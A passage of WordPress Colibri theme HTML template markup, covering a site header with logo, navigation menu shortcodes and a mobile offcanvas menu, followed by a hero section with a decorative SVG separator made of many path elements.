justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n                <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n                <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n                          <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n                                    <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n                                          </a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n                                    <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n                                          <!---->\n                                          <!---->\n                                          <div class=\"\">\n                                            <p>© 2022</p>\n                                          </div>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n    <div class=\"background-wrapper\">\n      <div class=\"background-layer background-layer-media-container-lg\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container-md\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n    </div>\n    <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n      <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n        <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n        <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n        <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n        <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n        <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n        <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n        <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n        <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n        <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n        <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n        <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n        <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n        <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n        <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n        <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n        <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n        <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n        <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n        <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n        <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n        <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n        <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n        <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n        <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n        <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n        <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n        <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n        <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n        <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n        <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n        <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n        <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n        <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n        <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n        <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n        <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n        <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n        <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n        <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n        <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n        <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n        <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n        <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n        <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n        <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n        <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n        <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n        <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n        <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n        <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n        <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n        <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n        <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n        <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n        <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n        <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n        <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n        <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n        <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n        <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n        <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n        <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n        <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n        <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n        <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n        <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n        <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n        <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n        <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n        <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n        <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n        <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n        <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n        <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n        <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n        <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n        <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n        <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n        <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n        <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n        <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n        <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n        <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n        <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n        <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n        <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n        <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n        <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n        <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n        <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n        <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n        <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n        <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n        <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n        <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n        <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n        <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n        <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n        <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n        <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n        <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n        <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n        <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n        <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n        <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n        <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n        <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n        <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n        <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n        <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n        <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n        <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n        <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n        <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n        <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n        <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n        <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n        <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n        <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n        <path 